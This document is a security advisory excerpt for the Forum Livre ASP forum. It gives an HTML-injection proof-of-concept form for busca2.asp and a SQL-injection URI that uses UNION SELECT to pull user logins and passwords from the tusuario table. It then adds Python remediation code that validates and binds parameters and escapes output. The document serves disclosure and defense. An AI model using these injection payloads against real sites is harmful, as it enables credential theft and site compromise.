Forum Livre Multiple Input Validation Vulnerabilities
To exploit an HTML-injection issue:

An attacker can exploit this issue via a web client.

An HTTP POST example has been provided:

http://www.example.com

<form method="POST" action="http://[TARGET]/[path]/busca2.asp">
<input type="text" name="palavra" value="[#]XSS HERE[#]">
<input type="radio" value="all" name="tipo" checked>
<input type="radio" value="some" name="tipo">
<select size="1" name="forum">
<option value="">Todos os foruns</option>
<option value="">Forum ComCatz</option>
<input type="submit" value="Investigar" name="B1">
</form>

To exploit a SQL-injection issue:

An attacker can exploit this issue via a web client.

An example URI has been provided:

http://www.example.com/info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario
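
The input handling that closes both issues, as an added example that is not from the advisory or from Forum Livre's own code: Python with sqlite3 stands in for the ASP pages, and the `id` key column, the sample row and all function names are assumptions. The `user` value is validated as an integer and bound as a query parameter, and `palavra` is HTML-encoded before it is echoed into the search form.

```python
import html
import sqlite3
from urllib.parse import unquote

# The `user` value from the advisory's example URI, URL-decoded as the server sees it.
SQLI_USER = unquote(
    "-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario")

def make_db():
    """Constructed stand-in for the forum database (the `id` column is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tusuario "
               "(id INTEGER PRIMARY KEY, loginu TEXT, senhau TEXT)")
    db.execute("INSERT INTO tusuario VALUES (1, 'alice', 'constructed-secret')")
    return db

def parse_user_id(raw):
    """Accept only 1 to 9 ASCII digits; anything else is rejected as None."""
    if raw.isascii() and raw.isdigit() and len(raw) <= 9:
        return int(raw)
    return None

def lookup_user(db, raw_user):
    """info_user.asp equivalent: validate first, then bind the value."""
    user_id = parse_user_id(raw_user)
    if user_id is None:
        return None  # a real handler would answer with HTTP 400 here
    row = db.execute("SELECT loginu FROM tusuario WHERE id = ?",
                     (user_id,)).fetchone()
    return row[0] if row else None

def lookup_bound_only(db, raw_user):
    """Binding alone: the whole string is compared as a value, never parsed as SQL."""
    return db.execute("SELECT loginu FROM tusuario WHERE id = ?",
                      (raw_user,)).fetchall()

def render_search_field(palavra):
    """busca2.asp equivalent: encode the term before echoing it into an attribute."""
    return ('<input type="text" name="palavra" value="%s">'
            % html.escape(palavra, quote=True))

if __name__ == "__main__":
    db = make_db()
    print(lookup_user(db, "1"), lookup_user(db, SQLI_USER))
    print(lookup_bound_only(db, SQLI_USER))
    print(render_search_field('"><b>x</b>'))  # constructed markup sample
```

In the ASP pages themselves the same two controls are a parameterized `ADODB.Command` in place of a concatenated query string, and `Server.HTMLEncode` on every request value written back into the response.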